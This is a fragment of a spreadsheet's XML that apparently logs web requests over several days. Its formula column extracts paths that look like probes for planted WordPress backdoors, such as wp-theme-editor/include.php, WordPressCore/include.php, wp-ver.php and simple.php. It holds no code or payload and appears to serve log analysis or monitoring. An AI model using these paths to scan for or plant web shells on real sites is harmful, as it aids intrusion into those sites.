      <c r="B893" t="s">
        <v>525</v>
      </c>
      <c r="C893" t="s">
        <v>351</v>
      </c>
      <c r="D893" t="str">
        <f t="shared" si="13"/>
        <v>wp-includes/widgets/include.php</v>
      </c>
      <c r="E893" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="894" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A894" s="1">
        <v>45456.81658564815</v>
      </c>
      <c r="B894" t="s">
        <v>525</v>
      </c>
      <c r="C894" t="s">
        <v>352</v>
      </c>
      <c r="D894" t="str">
        <f t="shared" si="13"/>
        <v>wp-includes/images/include.php</v>
      </c>
      <c r="E894" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="895" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A895" s="1">
        <v>45456.816331018519</v>
      </c>
      <c r="B895" t="s">
        <v>525</v>
      </c>
      <c r="C895" t="s">
        <v>504</v>
      </c>
      <c r="D895" t="str">
        <f t="shared" si="13"/>
        <v>wp-content/plugins/include.php</v>
      </c>
      <c r="E895" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="896" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A896" s="1">
        <v>45456.815972222219</v>
      </c>
      <c r="B896" t="s">
        <v>525</v>
      </c>
      <c r="C896" t="s">
        <v>402</v>
      </c>
      <c r="D896" t="str">
        <f t="shared" si="13"/>
        <v>wp-content/plugins/WordPressCore/include.php</v>
      </c>
      <c r="E896" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="897" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A897" s="1">
        <v>45456.661620370367</v>
      </c>
      <c r="B897" t="s">
        <v>559</v>
      </c>
      <c r="C897" t="s">
        <v>401</v>
      </c>
      <c r="D897" t="str">
        <f t="shared" si="13"/>
        <v>wp-content/plugins/wp-theme-editor/include.php</v>
      </c>
      <c r="E897" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="898" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A898" s="1">
        <v>45456.397685185184</v>
      </c>
      <c r="B898" t="s">
        <v>548</v>
      </c>
      <c r="C898" t="s">
        <v>353</v>
      </c>
      <c r="D898" t="str">
        <f t="shared" ref="D898:D961" si="14">MID(C898,FIND("#", SUBSTITUTE(C898, "/", "#", 3))+1,LEN(C898)-FIND("#", SUBSTITUTE(C898, "/", "#", 3))+1)</f>
        <v>wp-content/plugins/core-plugin/include.php</v>
      </c>
      <c r="E898" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="899" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A899" s="1">
        <v>45456.394988425927</v>
      </c>
      <c r="B899" t="s">
        <v>516</v>
      </c>
      <c r="C899" t="s">
        <v>401</v>
      </c>
      <c r="D899" t="str">
        <f t="shared" si="14"/>
        <v>wp-content/plugins/wp-theme-editor/include.php</v>
      </c>
      <c r="E899" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="900" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A900" s="1">
        <v>45456.340995370374</v>
      </c>
      <c r="B900" t="s">
        <v>547</v>
      </c>
      <c r="C900" t="s">
        <v>355</v>
      </c>
      <c r="D900" t="str">
        <f t="shared" si="14"/>
        <v>wp-content/plugins/wp-theme-editor/include.php</v>
      </c>
      <c r="E900" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="901" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A901" s="1">
        <v>45456.340775462966</v>
      </c>
      <c r="B901" t="s">
        <v>547</v>
      </c>
      <c r="C901" t="s">
        <v>358</v>
      </c>
      <c r="D901" t="str">
        <f t="shared" si="14"/>
        <v>wp-content/plugins/core-plugin/include.php</v>
      </c>
      <c r="E901" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="902" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A902" s="1">
        <v>45456.340532407405</v>
      </c>
      <c r="B902" t="s">
        <v>547</v>
      </c>
      <c r="C902" t="s">
        <v>357</v>
      </c>
      <c r="D902" t="str">
        <f t="shared" si="14"/>
        <v>wp-includes/images/include.php</v>
      </c>
      <c r="E902" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="903" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A903" s="1">
        <v>45456.340277777781</v>
      </c>
      <c r="B903" t="s">
        <v>547</v>
      </c>
      <c r="C903" t="s">
        <v>523</v>
      </c>
      <c r="D903" t="str">
        <f t="shared" si="14"/>
        <v>wp-content/plugins/WordPressCore/include.php</v>
      </c>
      <c r="E903" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="904" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A904" s="1">
        <v>45456.339872685188</v>
      </c>
      <c r="B904" t="s">
        <v>547</v>
      </c>
      <c r="C904" t="s">
        <v>524</v>
      </c>
      <c r="D904" t="str">
        <f t="shared" si="14"/>
        <v>wp-content/plugins/include.php</v>
      </c>
      <c r="E904" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="905" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A905" s="1">
        <v>45456.223981481482</v>
      </c>
      <c r="B905" t="s">
        <v>517</v>
      </c>
      <c r="C905" t="s">
        <v>401</v>
      </c>
      <c r="D905" t="str">
        <f t="shared" si="14"/>
        <v>wp-content/plugins/wp-theme-editor/include.php</v>
      </c>
      <c r="E905" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="906" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A906" s="1">
        <v>45456.177847222221</v>
      </c>
      <c r="B906" t="s">
        <v>555</v>
      </c>
      <c r="C906" t="s">
        <v>373</v>
      </c>
      <c r="D906" t="str">
        <f t="shared" si="14"/>
        <v>simple.php</v>
      </c>
      <c r="E906" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="907" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A907" s="1">
        <v>45456.177731481483</v>
      </c>
      <c r="B907" t="s">
        <v>555</v>
      </c>
      <c r="C907" t="s">
        <v>374</v>
      </c>
      <c r="D907" t="str">
        <f t="shared" si="14"/>
        <v>chosen.php</v>
      </c>
      <c r="E907" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="908" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A908" s="1">
        <v>45456.17759259259</v>
      </c>
      <c r="B908" t="s">
        <v>555</v>
      </c>
      <c r="C908" t="s">
        <v>375</v>
      </c>
      <c r="D908" t="str">
        <f t="shared" si="14"/>
        <v>style.php</v>
      </c>
      <c r="E908" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="909" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A909" s="1">
        <v>45456.177442129629</v>
      </c>
      <c r="B909" t="s">
        <v>555</v>
      </c>
      <c r="C909" t="s">
        <v>373</v>
      </c>
      <c r="D909" t="str">
        <f t="shared" si="14"/>
        <v>simple.php</v>
      </c>
      <c r="E909" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="910" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A910" s="1">
        <v>45456.170486111114</v>
      </c>
      <c r="B910" t="s">
        <v>555</v>
      </c>
      <c r="C910" t="s">
        <v>317</v>
      </c>
      <c r="D910" t="str">
        <f t="shared" si="14"/>
        <v>simple.php</v>
      </c>
      <c r="E910" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="911" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A911" s="1">
        <v>45456.170219907406</v>
      </c>
      <c r="B911" t="s">
        <v>555</v>
      </c>
      <c r="C911" t="s">
        <v>383</v>
      </c>
      <c r="D911" t="str">
        <f t="shared" si="14"/>
        <v>chosen.php</v>
      </c>
      <c r="E911" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="912" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A912" s="1">
        <v>45456.169918981483</v>
      </c>
      <c r="B912" t="s">
        <v>555</v>
      </c>
      <c r="C912" t="s">
        <v>230</v>
      </c>
      <c r="D912" t="str">
        <f t="shared" si="14"/>
        <v>style.php</v>
      </c>
      <c r="E912" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="913" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A913" s="1">
        <v>45456.169537037036</v>
      </c>
      <c r="B913" t="s">
        <v>555</v>
      </c>
      <c r="C913" t="s">
        <v>317</v>
      </c>
      <c r="D913" t="str">
        <f t="shared" si="14"/>
        <v>simple.php</v>
      </c>
      <c r="E913" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="914" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A914" s="1">
        <v>45456.069386574076</v>
      </c>
      <c r="B914" t="s">
        <v>522</v>
      </c>
      <c r="C914" t="s">
        <v>355</v>
      </c>
      <c r="D914" t="str">
        <f t="shared" si="14"/>
        <v>wp-content/plugins/wp-theme-editor/include.php</v>
      </c>
      <c r="E914" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="915" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A915" s="1">
        <v>45455.792268518519</v>
      </c>
      <c r="B915" t="s">
        <v>522</v>
      </c>
      <c r="C915" t="s">
        <v>401</v>
      </c>
      <c r="D915" t="str">
        <f t="shared" si="14"/>
        <v>wp-content/plugins/wp-theme-editor/include.php</v>
      </c>
      <c r="E915" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="916" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A916" s="1">
        <v>45455.636504629627</v>
      </c>
      <c r="B916" t="s">
        <v>525</v>
      </c>
      <c r="C916" t="s">
        <v>401</v>
      </c>
      <c r="D916" t="str">
        <f t="shared" si="14"/>
        <v>wp-content/plugins/wp-theme-editor/include.php</v>
      </c>
      <c r="E916" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="917" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A917" s="1">
        <v>45455.586145833331</v>
      </c>
      <c r="B917" t="s">
        <v>557</v>
      </c>
      <c r="C917" t="s">
        <v>353</v>
      </c>
      <c r="D917" t="str">
        <f t="shared" si="14"/>
        <v>wp-content/plugins/core-plugin/include.php</v>
      </c>
      <c r="E917" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="918" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A918" s="1">
        <v>45454.9374537037</v>
      </c>
      <c r="B918" t="s">
        <v>573</v>
      </c>
      <c r="C918" t="s">
        <v>351</v>
      </c>
      <c r="D918" t="str">
        <f t="shared" si="14"/>
        <v>wp-includes/widgets/include.php</v>
      </c>
      <c r="E918" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="919" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A919" s="1">
        <v>45454.937071759261</v>
      </c>
      <c r="B919" t="s">
        <v>573</v>
      </c>
      <c r="C919" t="s">
        <v>352</v>
      </c>
      <c r="D919" t="str">
        <f t="shared" si="14"/>
        <v>wp-includes/images/include.php</v>
      </c>
      <c r="E919" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="920" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A920" s="1">
        <v>45454.936840277776</v>
      </c>
      <c r="B920" t="s">
        <v>573</v>
      </c>
      <c r="C920" t="s">
        <v>402</v>
      </c>
      <c r="D920" t="str">
        <f t="shared" si="14"/>
        <v>wp-content/plugins/WordPressCore/include.php</v>
      </c>
      <c r="E920" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="921" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A921" s="1">
        <v>45454.936400462961</v>
      </c>
      <c r="B921" t="s">
        <v>573</v>
      </c>
      <c r="C921" t="s">
        <v>353</v>
      </c>
      <c r="D921" t="str">
        <f t="shared" si="14"/>
        <v>wp-content/plugins/core-plugin/include.php</v>
      </c>
      <c r="E921" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="922" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A922" s="1">
        <v>45454.896932870368</v>
      </c>
      <c r="B922" t="s">
        <v>502</v>
      </c>
      <c r="C922" t="s">
        <v>357</v>
      </c>
      <c r="D922" t="str">
        <f t="shared" si="14"/>
        <v>wp-includes/images/include.php</v>
      </c>
      <c r="E922" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="923" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A923" s="1">
        <v>45454.896840277775</v>
      </c>
      <c r="B923" t="s">
        <v>502</v>
      </c>
      <c r="C923" t="s">
        <v>523</v>
      </c>
      <c r="D923" t="str">
        <f t="shared" si="14"/>
        <v>wp-content/plugins/WordPressCore/include.php</v>
      </c>
      <c r="E923" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="924" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A924" s="1">
        <v>45454.896678240744</v>
      </c>
      <c r="B924" t="s">
        <v>502</v>
      </c>
      <c r="C924" t="s">
        <v>524</v>
      </c>
      <c r="D924" t="str">
        <f t="shared" si="14"/>
        <v>wp-content/plugins/include.php</v>
      </c>
      <c r="E924" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="925" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A925" s="1">
        <v>45454.775937500002</v>
      </c>
      <c r="B925" t="s">
        <v>547</v>
      </c>
      <c r="C925" t="s">
        <v>401</v>
      </c>
      <c r="D925" t="str">
        <f t="shared" si="14"/>
        <v>wp-content/plugins/wp-theme-editor/include.php</v>
      </c>
      <c r="E925" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="926" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A926" s="1">
        <v>45454.77548611111</v>
      </c>
      <c r="B926" t="s">
        <v>547</v>
      </c>
      <c r="C926" t="s">
        <v>351</v>
      </c>
      <c r="D926" t="str">
        <f t="shared" si="14"/>
        <v>wp-includes/widgets/include.php</v>
      </c>
      <c r="E926" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="927" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A927" s="1">
        <v>45454.775150462963</v>
      </c>
      <c r="B927" t="s">
        <v>547</v>
      </c>
      <c r="C927" t="s">
        <v>352</v>
      </c>
      <c r="D927" t="str">
        <f t="shared" si="14"/>
        <v>wp-includes/images/include.php</v>
      </c>
      <c r="E927" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="928" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A928" s="1">
        <v>45454.774780092594</v>
      </c>
      <c r="B928" t="s">
        <v>547</v>
      </c>
      <c r="C928" t="s">
        <v>402</v>
      </c>
      <c r="D928" t="str">
        <f t="shared" si="14"/>
        <v>wp-content/plugins/WordPressCore/include.php</v>
      </c>
      <c r="E928" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="929" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A929" s="1">
        <v>45454.774409722224</v>
      </c>
      <c r="B929" t="s">
        <v>547</v>
      </c>
      <c r="C929" t="s">
        <v>504</v>
      </c>
      <c r="D929" t="str">
        <f t="shared" si="14"/>
        <v>wp-content/plugins/include.php</v>
      </c>
      <c r="E929" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="930" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A930" s="1">
        <v>45454.74355324074</v>
      </c>
      <c r="B930" t="s">
        <v>518</v>
      </c>
      <c r="C930" t="s">
        <v>402</v>
      </c>
      <c r="D930" t="str">
        <f t="shared" si="14"/>
        <v>wp-content/plugins/WordPressCore/include.php</v>
      </c>
      <c r="E930" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="931" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A931" s="1">
        <v>45454.6643287037</v>
      </c>
      <c r="B931" t="s">
        <v>502</v>
      </c>
      <c r="C931" t="s">
        <v>401</v>
      </c>
      <c r="D931" t="str">
        <f t="shared" si="14"/>
        <v>wp-content/plugins/wp-theme-editor/include.php</v>
      </c>
      <c r="E931" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="932" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A932" s="1">
        <v>45454.664201388892</v>
      </c>
      <c r="B932" t="s">
        <v>502</v>
      </c>
      <c r="C932" t="s">
        <v>351</v>
      </c>
      <c r="D932" t="str">
        <f t="shared" si="14"/>
        <v>wp-includes/widgets/include.php</v>
      </c>
      <c r="E932" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="933" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A933" s="1">
        <v>45454.664039351854</v>
      </c>
      <c r="B933" t="s">
        <v>502</v>
      </c>
      <c r="C933" t="s">
        <v>352</v>
      </c>
      <c r="D933" t="str">
        <f t="shared" si="14"/>
        <v>wp-includes/images/include.php</v>
      </c>
      <c r="E933" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="934" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A934" s="1">
        <v>45454.663634259261</v>
      </c>
      <c r="B934" t="s">
        <v>502</v>
      </c>
      <c r="C934" t="s">
        <v>402</v>
      </c>
      <c r="D934" t="str">
        <f t="shared" si="14"/>
        <v>wp-content/plugins/WordPressCore/include.php</v>
      </c>
      <c r="E934" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="935" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A935" s="1">
        <v>45454.663310185184</v>
      </c>
      <c r="B935" t="s">
        <v>502</v>
      </c>
      <c r="C935" t="s">
        <v>504</v>
      </c>
      <c r="D935" t="str">
        <f t="shared" si="14"/>
        <v>wp-content/plugins/include.php</v>
      </c>
      <c r="E935" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="936" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A936" s="1">
        <v>45454.585659722223</v>
      </c>
      <c r="B936" t="s">
        <v>316</v>
      </c>
      <c r="C936" t="s">
        <v>416</v>
      </c>
      <c r="D936" t="str">
        <f t="shared" si="14"/>
        <v>?of=1</v>
      </c>
      <c r="E936" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="937" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A937" s="1">
        <v>45454.581076388888</v>
      </c>
      <c r="B937" t="s">
        <v>316</v>
      </c>
      <c r="C937" t="s">
        <v>368</v>
      </c>
      <c r="D937" t="str">
        <f t="shared" si="14"/>
        <v>?of=1</v>
      </c>
      <c r="E937" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="938" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A938" s="1">
        <v>45454.535879629628</v>
      </c>
      <c r="B938" t="s">
        <v>572</v>
      </c>
      <c r="C938" t="s">
        <v>353</v>
      </c>
      <c r="D938" t="str">
        <f t="shared" si="14"/>
        <v>wp-content/plugins/core-plugin/include.php</v>
      </c>
      <c r="E938" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="939" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A939" s="1">
        <v>45454.507361111115</v>
      </c>
      <c r="B939" t="s">
        <v>316</v>
      </c>
      <c r="C939" t="s">
        <v>508</v>
      </c>
      <c r="D939" t="str">
        <f t="shared" si="14"/>
        <v>inputs.php</v>
      </c>
      <c r="E939" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="940" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A940" s="1">
        <v>45454.503148148149</v>
      </c>
      <c r="B940" t="s">
        <v>316</v>
      </c>
      <c r="C940" t="s">
        <v>298</v>
      </c>
      <c r="D940" t="str">
        <f t="shared" si="14"/>
        <v>inputs.php</v>
      </c>
      <c r="E940" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="941" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A941" s="1">
        <v>45454.46980324074</v>
      </c>
      <c r="B941" t="s">
        <v>396</v>
      </c>
      <c r="C941" t="s">
        <v>401</v>
      </c>
      <c r="D941" t="str">
        <f t="shared" si="14"/>
        <v>wp-content/plugins/wp-theme-editor/include.php</v>
      </c>
      <c r="E941" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="942" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A942" s="1">
        <v>45454.469756944447</v>
      </c>
      <c r="B942" t="s">
        <v>396</v>
      </c>
      <c r="C942" t="s">
        <v>351</v>
      </c>
      <c r="D942" t="str">
        <f t="shared" si="14"/>
        <v>wp-includes/widgets/include.php</v>
      </c>
      <c r="E942" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="943" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A943" s="1">
        <v>45454.469687500001</v>
      </c>
      <c r="B943" t="s">
        <v>396</v>
      </c>
      <c r="C943" t="s">
        <v>352</v>
      </c>
      <c r="D943" t="str">
        <f t="shared" si="14"/>
        <v>wp-includes/images/include.php</v>
      </c>
      <c r="E943" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="944" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A944" s="1">
        <v>45454.469386574077</v>
      </c>
      <c r="B944" t="s">
        <v>396</v>
      </c>
      <c r="C944" t="s">
        <v>402</v>
      </c>
      <c r="D944" t="str">
        <f t="shared" si="14"/>
        <v>wp-content/plugins/WordPressCore/include.php</v>
      </c>
      <c r="E944" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="945" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A945" s="1">
        <v>45454.469328703701</v>
      </c>
      <c r="B945" t="s">
        <v>396</v>
      </c>
      <c r="C945" t="s">
        <v>504</v>
      </c>
      <c r="D945" t="str">
        <f t="shared" si="14"/>
        <v>wp-content/plugins/include.php</v>
      </c>
      <c r="E945" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="946" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A946" s="1">
        <v>45454.45521990741</v>
      </c>
      <c r="B946" t="s">
        <v>570</v>
      </c>
      <c r="C946" t="s">
        <v>279</v>
      </c>
      <c r="D946" t="str">
        <f t="shared" si="14"/>
        <v>wp-ver.php</v>
      </c>
      <c r="E946" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="947" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A947" s="1">
        <v>45453.760000000002</v>
      </c>
      <c r="B947" t="s">
        <v>529</v>
      </c>
      <c r="C947" t="s">
        <v>402</v>
      </c>
      <c r="D947" t="str">
        <f t="shared" si="14"/>
        <v>wp-content/plugins/WordPressCore/include.php</v>
      </c>
      <c r="E947" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="948" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A948" s="1">
        <v>45453.681319444448</v>
      </c>
      <c r="B948" t="s">
        <v>574</v>
      </c>
      <c r="C948" t="s">
        <v>279</v>
      </c>
      <c r="D948" t="str">
        <f t="shared" si="14"/>
        <v>wp-ver.php</v>
      </c>
      <c r="E948" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="949" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A949" s="1">
        <v>45453.520092592589</v>
      </c>
      <c r="B949" t="s">
        <v>529</v>
      </c>
      <c r="C949" t="s">
        <v>402</v>
      </c>
      <c r="D949" t="str">
        <f t="shared" si="14"/>
        <v>wp-content/plugins/WordPressCore/include.php</v>
      </c>
      <c r="E949" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="950" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A950" s="1">
        <v>45452.601342592592</v>
      </c>
      <c r="B950" t="s">
        <v>575</v>
      </c>
      <c r="C950" t="s">
        <v>402</v>
      </c>
      <c r="D950" t="str">
        <f t="shared" si="14"/>
        <v>wp-content/plugins/WordPressCore/include.php</v>
      </c>
      <c r="E950" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="951" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A951" s="1">
        <v>45452.543275462966</v>
      </c>
      <c r="B951" t="s">
        <v>576</v>
      </c>
      <c r="C951" t="s">
        <v>5</v>
      </c>
      <c r="D951" t="str">
        <f t="shared" si="14"/>
        <v/>
      </c>
      <c r="E951" t="s">
        <v>61</v>
      </c>
    </row>
    <row r="952" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A952" s="1">
        <v>45452.380023148151</v>
      </c>
      <c r="B952" t="s">
        <v>477</v>
      </c>
      <c r="C952" t="s">
        <v>279</v>
      </c>
      <c r="D952" t="str">
        <f t="shared" si="14"/>
        <v>wp-ver.php</v>
      </c>
      <c r="E952" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="953" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A953" s="1">
        <v>45452.302303240744</v>
      </c>
      <c r="B953" t="s">
        <v>577</v>
      </c>
      <c r="C953" t="s">
        <v>279</v>
      </c>
      <c r="D953" t="str">
        <f t="shared" si="14"/>
        <v>wp-ver.php</v>
      </c>
      <c r="E953" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="954" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A954" s="1">
        <v>45452.273495370369</v>
      </c>
      <c r="B954" t="s">
        <v>396</v>
      </c>
      <c r="C954" t="s">
        <v>401</v>
      </c>
      <c r="D954" t="str">
        <f t="shared" si="14"/>
        <v>wp-content/plugins/wp-theme-editor/include.php</v>
      </c>
      <c r="E954" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="955" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A955" s="1">
        <v>45452.228958333333</v>
      </c>
      <c r="B955" t="s">
        <v>557</v>
      </c>
      <c r="C955" t="s">
        <v>355</v>
      </c>
      <c r="D955" t="str">
        <f t="shared" si="14"/>
        <v>wp-content/plugins/wp-theme-editor/include.php</v>
      </c>
      <c r="E955" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="956" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A956" s="1">
        <v>45452.228622685187</v>
      </c>
      <c r="B956" t="s">
        <v>557</v>
      </c>
      <c r="C956" t="s">
        <v>356</v>
      </c>
      <c r="D956" t="str">
        <f t="shared" si="14"/>
        <v>wp-includes/widgets/include.php</v>
      </c>
      <c r="E956" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="957" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A957" s="1">
        <v>45452.22824074074</v>
      </c>
      <c r="B957" t="s">
        <v>557</v>
      </c>
      <c r="C957" t="s">
        <v>357</v>
      </c>
      <c r="D957" t="str">
        <f t="shared" si="14"/>
        <v>wp-includes/images/include.php</v>
      </c>
      <c r="E957" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="958" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A958" s="1">
        <v>45452.228020833332</v>
      </c>
      <c r="B958" t="s">
        <v>557</v>
      </c>
      <c r="C958" t="s">
        <v>523</v>
      </c>
      <c r="D958" t="str">
        <f t="shared" si="14"/>
        <v>wp-content/plugins/WordPressCore/include.php</v>
      </c>
      <c r="E958" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="959" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A959" s="1">
        <v>45452.227754629632</v>
      </c>
      <c r="B959" t="s">
        <v>557</v>
      </c>
      <c r="C959" t="s">
        <v>358</v>
      </c>
      <c r="D959" t="str">
        <f t="shared" si="14"/>
        <v>wp-content/plugins/core-plugin/include.php</v>
      </c>
      <c r="E959" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="960" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A960" s="1">
        <v>45451.695115740738</v>
      </c>
      <c r="B960" t="s">
        <v>322</v>
      </c>
      <c r="C960" t="s">
        <v>168</v>
      </c>
      <c r="D960" t="str">
        <f t="shared" si="14"/>
        <v>wp-content/plugins/wp-catcher/</v>
      </c>
      <c r="E960" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="961" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A961" s="1">
        <v>45451.61204861111</v>
      </c>
      <c r="B961" t="s">
        <v>322</v>
      </c>
      <c r="C961" t="s">
        <v>168</v>
      </c>
      <c r="D961" t="str">
        <f t="shared" si="14"/>
        <v>wp-content/plugins/wp-catcher/</v>
      </c>
      <c r="E961" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="962" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A962" s="1">
        <v>45451.506307870368</v>
      </c>
      <c r="B962" t="s">
        <v>547</v>
      </c>
      <c r="C962" t="s">
        <v>402</v>
      </c>
      <c r="D962" t="str">
        <f t="shared" ref="D962:D1025" si="15">MID(C962,FIND("#", SUBSTITUTE(C962, "/", "#", 3))+1,LEN(C962)-FIND("#", SUBSTITUTE(C962, "/", "#", 3))+1)</f>
        <v>wp-content/plugins/WordPressCore/include.php</v>
      </c>
      <c r="E962" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="963" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A963" s="1">
        <v>45451.129189814812</v>
      </c>
      <c r="B963" t="s">
        <v>396</v>
      </c>
      <c r="C963" t="s">
        <v>401</v>
      </c>
      <c r="D963" t="str">
        <f t="shared" si="15"/>
        <v>wp-content/plugins/wp-theme-editor/include.php</v>
      </c>
      <c r="E963" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="964" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A964" s="1">
        <v>45450.785312499997</v>
      </c>
      <c r="B964" t="s">
        <v>396</v>
      </c>
      <c r="C964" t="s">
        <v>401</v>
      </c>
      <c r="D964" t="str">
        <f t="shared" si="15"/>
        <v>wp-content/plugins/wp-theme-editor/include.php</v>
      </c>
      <c r="E964" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="965" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A965" s="1">
        <v>45450.783530092594</v>
      </c>
      <c r="B965" t="s">
        <v>578</v>
      </c>
      <c r="C965" t="s">
        <v>5</v>
      </c>
      <c r="D965" t="str">
        <f t="shared" si="15"/>
        <v/>
      </c>
      <c r="E965" t="s">
        <v>579</v>
      </c>
    </row>
